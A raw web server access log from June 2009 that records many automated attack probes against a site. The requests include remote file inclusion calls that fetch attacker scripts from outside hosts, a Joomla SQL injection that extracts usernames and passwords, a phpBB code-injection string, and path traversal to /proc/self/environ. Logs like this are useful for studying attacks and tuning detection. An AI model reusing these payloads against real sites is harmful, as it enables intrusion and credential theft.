210.116.102.163 - - [06/Jun/2009:00:01:46 -0400] "GET /e404.php?DOCUMENT_ROOT=http://hallelujah.wo.to/bbs/do?? HTTP/1.1" 404 206 "-" "libwww-perl/5.803"
203.146.102.38 - - [06/Jun/2009:00:02:00 -0400] "GET /logs/access_log.Q109052900/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:00:03:19 -0400] "GET /logs/port.php?content=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:00:03:19 -0400] "GET /port.php?content=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:00:03:19 -0400] "GET /logs/access_log.Q108112300%20%20/port.php?content=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:00:03:19 -0400] "GET /logs/access_log.Q109052900%20%20/port.php?content=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:00:03:58 -0400] "GET /logs/access_log.Q108112300/port.php?content=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:00:03:58 -0400] "GET /logs/access_log.Q109052900/port.php?content=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:00:05:28 -0400] "GET /logs/access_log.Q109053000/port.php?content=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.146.102.38 - - [06/Jun/2009:00:06:20 -0400] "GET /logs/access_log.Q109050300/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [06/Jun/2009:00:08:48 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
116.36.213.166 - - [06/Jun/2009:00:08:49 -0400] "GET //index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
116.36.213.166 - - [06/Jun/2009:00:08:49 -0400] "GET /logs//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
116.36.213.166 - - [06/Jun/2009:00:08:58 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
116.36.213.166 - - [06/Jun/2009:00:08:58 -0400] "GET //index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
116.36.213.166 - - [06/Jun/2009:00:08:58 -0400] "GET /logs//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
116.36.213.166 - - [06/Jun/2009:00:09:03 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
116.36.213.166 - - [06/Jun/2009:00:09:03 -0400] "GET //index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
116.36.213.166 - - [06/Jun/2009:00:09:04 -0400] "GET /logs//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
201.232.54.48 - - [06/Jun/2009:00:11:35 -0400] "GET /logs/send_reminders.php?includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:00:11:35 -0400] "GET /send_reminders.php?includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:00:12:43 -0400] "GET /send_reminders.php?includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:00:12:43 -0400] "GET /logs/send_reminders.php?includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:00:12:58 -0400] "GET /logs/send_reminders.php?includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:00:12:58 -0400] "GET /send_reminders.php?includedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
122.153.28.140 - - [06/Jun/2009:00:13:03 -0400] "GET /logs/error_log.Q109050700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
122.153.28.140 - - [06/Jun/2009:00:13:32 -0400] "GET /logs/error_log.Q109050700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
123.143.98.5 - - [06/Jun/2009:00:13:33 -0400] "GET /logs/error_log.Q109051600//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
123.143.98.5 - - [06/Jun/2009:00:15:02 -0400] "GET /logs/error_log.Q109051600//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jun/2009:00:15:07 -0400] "GET /logs//tools/send_reminders.php?includedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:00:15:07 -0400] "GET //tools/send_reminders.php?includedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:00:15:07 -0400] "GET //tools/send_reminders.php?includedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:00:15:07 -0400] "GET /logs//tools/send_reminders.php?includedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.106.76.218 - - [06/Jun/2009:00:16:14 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
117.110.57.130 - - [06/Jun/2009:00:16:17 -0400] "GET /logs/error_log.Q109051600//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
121.165.73.157 - - [06/Jun/2009:00:18:22 -0400] "GET /index1.php?site=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:00:18:22 -0400] "GET /logs/index1.php?site=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:00:18:22 -0400] "GET /logs/access_log.Q109052300/index1.php?site=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:00:18:52 -0400] "GET /logs/access_log.Q109052300%20%20/index1.php?site=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:00:19:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.1.64.133 - - [06/Jun/2009:00:20:21 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
218.1.64.133 - - [06/Jun/2009:00:20:21 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
218.1.64.133 - - [06/Jun/2009:00:20:21 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
218.1.64.133 - - [06/Jun/2009:00:20:22 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
218.1.64.133 - - [06/Jun/2009:00:20:22 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 208 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:20:23 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:20:24 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
218.1.64.133 - - [06/Jun/2009:00:20:25 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:20:25 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
218.1.64.133 - - [06/Jun/2009:00:20:25 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:20:25 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 213 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:20:26 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "XXXXXX"
151.1.154.24 - - [06/Jun/2009:00:20:59 -0400] "GET /samplefaqsupport.php?path[docroot]=http://www.ingoodformllc.com/images/id2345555555.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
218.149.85.37 - - [06/Jun/2009:00:23:17 -0400] "GET /logs/error_log.Q109051600//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
89.223.3.98 - - [06/Jun/2009:00:23:20 -0400] "GET /index1.php?dat=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [06/Jun/2009:00:23:20 -0400] "GET /logs/index1.php?dat=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [06/Jun/2009:00:23:20 -0400] "GET /logs/error_log.Q109013000%20%20/index1.php?dat=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.1.64.133 - - [06/Jun/2009:00:23:21 -0400] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.1.64.133 - - [06/Jun/2009:00:23:21 -0400] "GET /logs/access_log.Q109051600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
89.223.3.98 - - [06/Jun/2009:00:23:23 -0400] "GET /index1.php?dat=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [06/Jun/2009:00:23:23 -0400] "GET /logs/index1.php?dat=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [06/Jun/2009:00:23:23 -0400] "GET /logs/error_log.Q109013000%20%20/index1.php?dat=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.1.64.133 - - [06/Jun/2009:00:23:23 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
218.1.64.133 - - [06/Jun/2009:00:23:23 -0400] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 231 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:23:25 -0400] "GET /logs/access_log.Q109051600/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
218.1.64.133 - - [06/Jun/2009:00:23:25 -0400] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.1.64.133 - - [06/Jun/2009:00:23:26 -0400] "GET /logs/access_log.Q109051600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 253 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:23:26 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
218.1.64.133 - - [06/Jun/2009:00:23:26 -0400] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 226 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:23:26 -0400] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 231 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:23:27 -0400] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:23:29 -0400] "GET /logs/access_log.Q109051600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 253 "-" "XXXXXX"
89.223.3.98 - - [06/Jun/2009:00:23:31 -0400] "GET /logs/error_log.Q109013000/index1.php?dat=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.223.3.98 - - [06/Jun/2009:00:23:33 -0400] "GET /logs/error_log.Q109013000/index1.php?dat=http://www.proektov.ru/v5id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:00:24:05 -0400] "GET /logs/error_log.Q109051600//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
209.59.12.99 - - [06/Jun/2009:00:24:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
151.1.154.24 - - [06/Jun/2009:00:24:57 -0400] "GET /logs/access_log.Q109010700/samplefaqsupport.php?path[docroot]=http://www.maliodkrywcy.pl///images/id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
151.1.154.24 - - [06/Jun/2009:00:24:58 -0400] "GET /samplefaqsupport.php?path[docroot]=http://www.maliodkrywcy.pl///images/id.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
151.1.154.24 - - [06/Jun/2009:00:24:58 -0400] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.maliodkrywcy.pl///images/id.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
151.1.154.24 - - [06/Jun/2009:00:27:11 -0400] "GET /logs/access_log.Q108121900/samplefaqsupport.php?path[docroot]=http://www.maliodkrywcy.pl///images/id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
209.59.12.99 - - [06/Jun/2009:00:29:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.76.218 - - [06/Jun/2009:00:30:24 -0400] "GET /logs/access_log.Q109051800//index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
87.106.76.218 - - [06/Jun/2009:00:30:25 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
66.175.122.228 - - [06/Jun/2009:00:30:30 -0400] "GET /logs/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:00:30:30 -0400] "GET /logs/access_log.Q109052100/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:00:30:30 -0400] "GET /pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:00:30:31 -0400] "GET /pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:00:30:31 -0400] "GET /logs/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:00:30:31 -0400] "GET /logs/access_log.Q109052100/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:00:30:33 -0400] "GET /pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:00:30:33 -0400] "GET /logs/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:00:30:33 -0400] "GET /logs/access_log.Q109052100/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:00:31:18 -0400] "GET /logs/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:00:31:18 -0400] "GET /pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
66.175.122.228 - - [06/Jun/2009:00:31:18 -0400] "GET /logs/access_log.Q109052100/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jun/2009:00:31:45 -0400] "GET /pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jun/2009:00:31:45 -0400] "GET /logs/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jun/2009:00:31:45 -0400] "GET /logs/access_log.Q109052100/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.6.8.112 - - [06/Jun/2009:00:31:53 -0400] "GET /logs/access_log.Q107071500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
190.144.44.36 - - [06/Jun/2009:00:32:01 -0400] "GET /pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jun/2009:00:32:01 -0400] "GET /logs/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jun/2009:00:32:01 -0400] "GET /logs/access_log.Q109052100/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
76.166.213.113 - - [06/Jun/2009:00:32:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
76.166.213.113 - - [06/Jun/2009:00:32:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
66.175.122.228 - - [06/Jun/2009:00:32:33 -0400] "GET /logs/access_log.Q109053000/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.1.64.133 - - [06/Jun/2009:00:33:01 -0400] "GET /logs/error_log.Q109042900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
218.1.64.133 - - [06/Jun/2009:00:33:02 -0400] "GET /logs/error_log.Q109042900/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
218.1.64.133 - - [06/Jun/2009:00:33:02 -0400] "GET /logs/error_log.Q109042900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:33:03 -0400] "GET /logs/error_log.Q109042900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
190.144.44.36 - - [06/Jun/2009:00:33:03 -0400] "GET /pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jun/2009:00:33:03 -0400] "GET /logs/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jun/2009:00:33:03 -0400] "GET /logs/access_log.Q109052100/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.76.218 - - [06/Jun/2009:00:33:13 -0400] "GET /logs/access_log.Q109052400//index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
66.175.122.228 - - [06/Jun/2009:00:33:27 -0400] "GET /logs/access_log.Q109053000/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jun/2009:00:33:59 -0400] "GET /logs/access_log.Q109053000/pcanvas.php?cropimagedir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:00:34:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [06/Jun/2009:00:39:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.24.218.140 - - [06/Jun/2009:00:39:54 -0400] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.westsite.org.ru/404.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.826"
